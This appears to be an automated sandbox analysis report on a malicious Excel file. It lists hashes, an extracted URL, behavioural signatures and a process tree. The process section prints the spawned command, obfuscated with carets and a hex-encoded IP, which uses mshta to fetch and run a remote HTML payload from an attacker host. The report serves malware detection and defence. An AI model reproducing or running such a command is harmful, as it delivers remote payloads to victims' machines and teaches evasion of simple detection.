Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 19:45
Behavioral task
behavioral1
Sample
e6a99c356a6b6d7759ee7c830dffd93ab24d00d503abc2ad22e3dfc286b66579.xls
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
e6a99c356a6b6d7759ee7c830dffd93ab24d00d503abc2ad22e3dfc286b66579.xls
Resource
win10v2004-20241007-en
General
-
Target
e6a99c356a6b6d7759ee7c830dffd93ab24d00d503abc2ad22e3dfc286b66579.xls
-
Size
113KB
-
MD5
a9e7c90d8709f818d5c6e5c914bc4f6d
-
SHA1
5e1091bed8a354a7e2391cb2a6d0b0821bf5a0ac
-
SHA256
e6a99c356a6b6d7759ee7c830dffd93ab24d00d503abc2ad22e3dfc286b66579
-
SHA512
fef543109cf780a962932d8df570678dc7fcf5ffd7e0e78c0a890bd30fa34ef55cad29ebaa5280b9959f55b758239454446ff1b498ad3095aefd7412c2036567
-
SSDEEP
3072:yW+nBqmsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIXxe53lGvFTQ3IzxgdrvxpU0S:t+nBqmsk3hbdlylKsgqopeJBWhZFVE+S
Malware Config
Extracted
http://185.7.214.7/fer/fe5.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2724 2096 cmd.exe 30 -
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid Process 5 2916 mshta.exe 6 2916 mshta.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
mshta.exeEXCEL.EXEcmd.exePING.EXEtimeout.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 2724 cmd.exe 2128 PING.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 2684 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
mshta.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 2096 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid Process 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid Process procid_target PID 2096 wrote to memory of 2724 2096 EXCEL.EXE 31 PID 2096 wrote to memory of 2724 2096 EXCEL.EXE 31 PID 2096 wrote to memory of 2724 2096 EXCEL.EXE 31 PID 2096 wrote to memory of 2724 2096 EXCEL.EXE 31 PID 2724 wrote to memory of 2128 2724 cmd.exe 33 PID 2724 wrote to memory of 2128 2724 cmd.exe 33 PID 2724 wrote to memory of 2128 2724 cmd.exe 33 PID 2724 wrote to memory of 2128 2724 cmd.exe 33 PID 2724 wrote to memory of 2684 2724 cmd.exe 34 PID 2724 wrote to memory of 2684 2724 cmd.exe 34 PID 2724 wrote to memory of 2684 2724 cmd.exe 34 PID 2724 wrote to memory of 2684 2724 cmd.exe 34 PID 2724 wrote to memory of 2916 2724 cmd.exe 35 PID 2724 wrote to memory of 2916 2724 cmd.exe 35 PID 2724 wrote to memory of 2916 2724 cmd.exe 35 PID 2724 wrote to memory of 2916 2724 cmd.exe 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\e6a99c356a6b6d7759ee7c830dffd93ab24d00d503abc2ad22e3dfc286b66579.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\SysWOW64\cmd.execmd /c ping google.com && timeout 4 && start ms^h^ta ht^tp:/^/0x^b^907d60^7/fe^r/f^e5.h^tm^l2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\PING.EXEping google.com3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2128
-
-
C:\Windows\SysWOW64\timeout.exetimeout 43⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2684
-
-
C:\Windows\SysWOW64\mshta.exemshta http://0xb907d607/fer/fe5.html3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2916
-
-